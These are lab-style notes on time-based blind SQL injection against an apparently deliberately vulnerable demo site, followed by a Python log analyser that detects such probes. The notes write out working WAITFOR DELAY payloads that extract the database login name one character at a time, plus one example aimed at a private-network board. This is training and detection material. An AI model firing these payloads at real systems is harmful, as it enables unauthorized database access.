http://testaspnet.vulnweb.com/
Open any post and find the comment page like the one below.
Once you open it, a page like the one below appears.
http://testaspnet.vulnweb.com/Comments.aspx?id=2 AND 1=0 // hides the comments above
Finding the DB login ID
ex) http://192.168.0.24/MySite/board/board_view.asp?num=7;if(ascii(substring((select system_user), 1, 1))>115) waitfor delay '0:0:5'
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))>97) waitfor delay '0:0:5' → seems not
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))<122) waitfor delay '0:0:5' → seems right
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 1, 1))>=97) waitfor delay '0:0:5' → right? → a

http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))>=97) waitfor delay '0:0:5' → what?
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<122) waitfor delay '0:0:5' → is it right?
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<100) waitfor delay '0:0:5' → takes a long time
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))<99) waitfor delay '0:0:5' → fast
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 2, 1))=99) waitfor delay '0:0:5' → seems right, slower than before → c

http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>110) waitfor delay '0:0:5' → slow
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>118) waitfor delay '0:0:5' → fast, fast
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 3, 1))>=117) waitfor delay '0:0:5' → slow → u → Answer: acunetix ←

http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 9, 1))<122) waitfor delay '0:0:5' → fast
http://testaspnet.vulnweb.com/Comments.aspx?id=0 and 1=0; if (ascii(substring((select system_user), 9, 1))>65) waitfor delay '0:0:5' → fast
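How the probes above look from the server side, as an added example that is not part of the original notes: a log check that flags non-integer id values carrying a WAITFOR DELAY, records which character positions were probed, and counts how many responses actually stalled for the requested delay. The three-field log layout (client, request URI, time taken in ms), the sample lines and the function name analyse are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log lines: client, request URI, time-taken (ms). Not real traffic.
SAMPLE_LOG = """\
203.0.113.7 /Comments.aspx?id=2 41
203.0.113.7 /Comments.aspx?id=0%20and%201=0;%20if%20(ascii(substring((select%20system_user),%201,%201))>97)%20waitfor%20delay%20'0:0:5' 38
203.0.113.7 /Comments.aspx?id=0%20and%201=0;%20if%20(ascii(substring((select%20system_user),%201,%201))>=97)%20waitfor%20delay%20'0:0:5' 5044
203.0.113.7 /Comments.aspx?id=0%20and%201=0;%20if%20(ascii(substring((select%20system_user),%202,%201))=99)%20waitfor%20delay%20'0:0:5' 5051
198.51.100.9 /Comments.aspx?id=3 35
"""

# T-SQL delay primitive and the substring(expr, position, length) probe seen in the notes.
DELAY = re.compile(r"waitfor\s+delay\s*'(\d+):(\d+):(\d+)'", re.I)
PROBE = re.compile(r"substring\s*\(.*?,\s*(\d+)\s*,\s*\d+\s*\)", re.I)

def analyse(log_text):
    """Return {client: {"probes": n, "positions": [...], "delayed": n}} for flagged clients."""
    report = defaultdict(lambda: {"probes": 0, "positions": set(), "delayed": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, uri, ms = line.split()
        query = uri.partition("?")[2]
        # Split on '&' only, so a ';' stacked-query separator stays inside the value.
        params = dict(p.partition("=")[::2] for p in query.split("&"))
        value = unquote(params.get("id", ""))
        if value.isdigit():
            continue  # a well-formed id is a plain integer
        delay = DELAY.search(value)
        if not delay:
            continue
        hours, minutes, seconds = map(int, delay.groups())
        entry = report[client]
        entry["probes"] += 1
        probe = PROBE.search(value)
        if probe:
            entry["positions"].add(int(probe.group(1)))
        # A response at least as slow as the requested delay means the injected
        # statement ran on the database: confirmed injection, not just an attempt.
        if int(ms) >= (hours * 3600 + minutes * 60 + seconds) * 1000:
            entry["delayed"] += 1
    return {c: {**e, "positions": sorted(e["positions"])} for c, e in report.items()}

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

A non-zero "delayed" count is the signal to treat the endpoint as exploited; the fix on the application side is to bind id as an integer parameter instead of concatenating it into the query.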